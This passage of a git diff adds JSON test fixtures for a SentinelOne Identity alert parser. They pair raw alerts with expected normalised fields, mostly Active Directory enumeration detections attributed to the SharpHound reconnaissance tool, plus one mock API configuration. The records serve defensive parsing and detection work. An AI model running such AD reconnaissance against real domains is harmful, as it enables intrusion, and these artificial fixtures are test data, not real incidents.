"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-eb28-7a57-9c27-87843b2cec61", + "name": "AD Service Account Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_13.json b/SentinelOne/identity/tests/test_alert_13.json new file mode 100644 index 000000000..a31ef954f --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_13.json @@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935310-c715-72c9-bbd9-dc1ff6a7ff1e\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-c715-72c9-bbd9-dc1ff6a7ff1e\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-c715-72c9-bbd9-dc1ff6a7ff1e", + "name": "AD Domain Computer Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_14.json b/SentinelOne/identity/tests/test_alert_14.json new file mode 100644 index 000000000..7b9fc10e1 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_14.json @@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935310-cb9b-770e-96ee-632d4d21520b\", \"name\": \"AD ACL Enumeration\", \"description\": \"This event is generated when a command used to query or read the ACL's\\\\ Permission of any object in Active Directory.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-cb9b-770e-96ee-632d4d21520b\", \"name\": \"AD ACL Enumeration\", \"description\": \"This event is generated when a command used to query or read the ACL's\\\\ Permission of any object in Active Directory.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is generated when a command used to query or read the ACL's\\ Permission of any object in Active Directory.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-cb9b-770e-96ee-632d4d21520b", + "name": "AD ACL Enumeration", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_15.json b/SentinelOne/identity/tests/test_alert_15.json new file mode 100644 index 000000000..d8a7c1f8a --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_15.json @@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935310-d4ba-7131-9e08-defa8b3aeb52\", \"name\": \"Domain Users Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-d4ba-7131-9e08-defa8b3aeb52\", \"name\": \"Domain Users Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to dump all the users in the Active Directory Domain.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-d4ba-7131-9e08-defa8b3aeb52", + "name": "Domain Users Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_16.json b/SentinelOne/identity/tests/test_alert_16.json new file mode 100644 index 000000000..8a5217a55 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_16.json @@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:50Z", + "kind": "alert", + "provider": "Identity", + "reason": "This events is raised when a LDAP search Query is detected from the endpoint.", + "start": "2024-11-22T08:45:50Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:50Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-dc47-75de-8925-5f026bd5a705", + "name": "LDAP Search Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json new file mode 100644 index 000000000..6d697a5be --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_2.json @@ -0,0 +1,22 @@ +{ + "input": { + "message": "{\n \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n \"lastMigration\": 33,\n \"name\": \"Mocked api\",\n \"endpointPrefix\": \"\",\n \"latency\": 0,\n \"port\": 3000,\n \"hostname\": \"\",\n \"folders\": [\n {\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n \"name\": \"user\",\n \"children\": [\n {\n \"type\": \"route\",\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n }\n ]\n }\n ],\n \"routes\": [\n {\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n \"type\": \"http\",\n \"documentation\": \"Creates new user\",\n \"method\": \"post\",\n \"endpoint\": \"user\",\n \"responses\": [\n {\n \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"w34k\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"CreateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n \"type\": \"http\",\n \"documentation\": \"Logout\",\n \"method\": \"post\",\n \"endpoint\": \"user/logout\",\n \"responses\": [\n {\n \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n \"type\": \"http\",\n \"documentation\": \"Authenticate user with credentials\",\n \"method\": \"post\",\n \"endpoint\": \"user/authenticate\",\n \"responses\": [\n {\n \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"AuthenticateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n \"type\": \"http\",\n \"documentation\": \"Refresh Session\",\n \"method\": \"post\",\n \"endpoint\": \"user/refresh-session\",\n \"responses\": [\n {\n \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": true,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n \"type\": \"http\",\n \"documentation\": \"Auth required\",\n \"method\": \"all\",\n \"endpoint\": \"*\",\n \"responses\": [\n {\n \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"header\",\n \"modifier\": \"funfy-auth-token\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user\",\n \"invert\": true,\n \"operator\": \"equals\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user/authenticate\",\n \"invert\": true,\n \"operator\": \"equals\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n \"type\": \"http\",\n \"documentation\": \"RefreshToken is required\",\n \"method\": \"all\",\n \"endpoint\": \"user/*\",\n \"responses\": [\n {\n \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$.refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n \"type\": \"http\",\n \"documentation\": \"\",\n \"method\": \"get\",\n \"endpoint\": \"test\",\n \"responses\": [\n {\n \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n \"body\": \"{\\n \\\"message\\\": \\\"route required auth\\\"\\n}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n }\n ],\n \"rootChildren\": [\n {\n \"type\": \"route\",\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n },\n {\n \"type\": \"folder\",\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n }\n ],\n \"proxyMode\": false,\n \"proxyHost\": \"\",\n \"proxyRemovePrefix\": false,\n \"tlsOptions\": {\n \"enabled\": false,\n \"type\": \"CERT\",\n \"pfxPath\": \"\",\n \"certPath\": \"\",\n \"keyPath\": \"\",\n \"caPath\": \"\",\n \"passphrase\": \"\"\n },\n \"cors\": true,\n \"headers\": [\n {\n \"key\": \"Content-Type\",\n \"value\": \"application/json\"\n },\n {\n \"key\": \"Access-Control-Allow-Origin\",\n \"value\": \"*\"\n },\n {\n \"key\": \"Access-Control-Allow-Methods\",\n \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n },\n {\n \"key\": \"Access-Control-Allow-Headers\",\n \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n }\n ],\n \"proxyReqHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"proxyResHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"data\": [\n {\n \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n \"id\": \"8wey\",\n \"name\": \"Globals\",\n \"documentation\": \"\",\n \"value\": \"\"\n },\n {\n \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n \"id\": \"zzay\",\n \"name\": \"ISODate\",\n \"documentation\": \"Datetime shared format comes from backend\",\n \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n },\n {\n \"uuid\": \"160c80f4-39c7-494d-a489-06da2e51aa87\",\n \"id\": \"g4qq\",\n \"name\": \"CreateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n \"id\": \"ofz6\",\n \"name\": \"AuthenticateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n \"id\": \"w34k\",\n \"name\": \"User\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n },\n {\n \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n \"id\": \"77fk\",\n \"name\": \"Authentication\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n }\n ],\n \"callbacks\": []\n}" + }, + "expected": { + "message": "{\n \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n \"lastMigration\": 33,\n \"name\": \"Mocked api\",\n \"endpointPrefix\": \"\",\n \"latency\": 0,\n \"port\": 3000,\n \"hostname\": \"\",\n \"folders\": [\n {\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n \"name\": \"user\",\n \"children\": [\n {\n \"type\": \"route\",\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n }\n ]\n }\n ],\n \"routes\": [\n {\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n \"type\": \"http\",\n \"documentation\": \"Creates new user\",\n \"method\": \"post\",\n \"endpoint\": \"user\",\n \"responses\": [\n {\n \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"w34k\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"CreateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n \"type\": 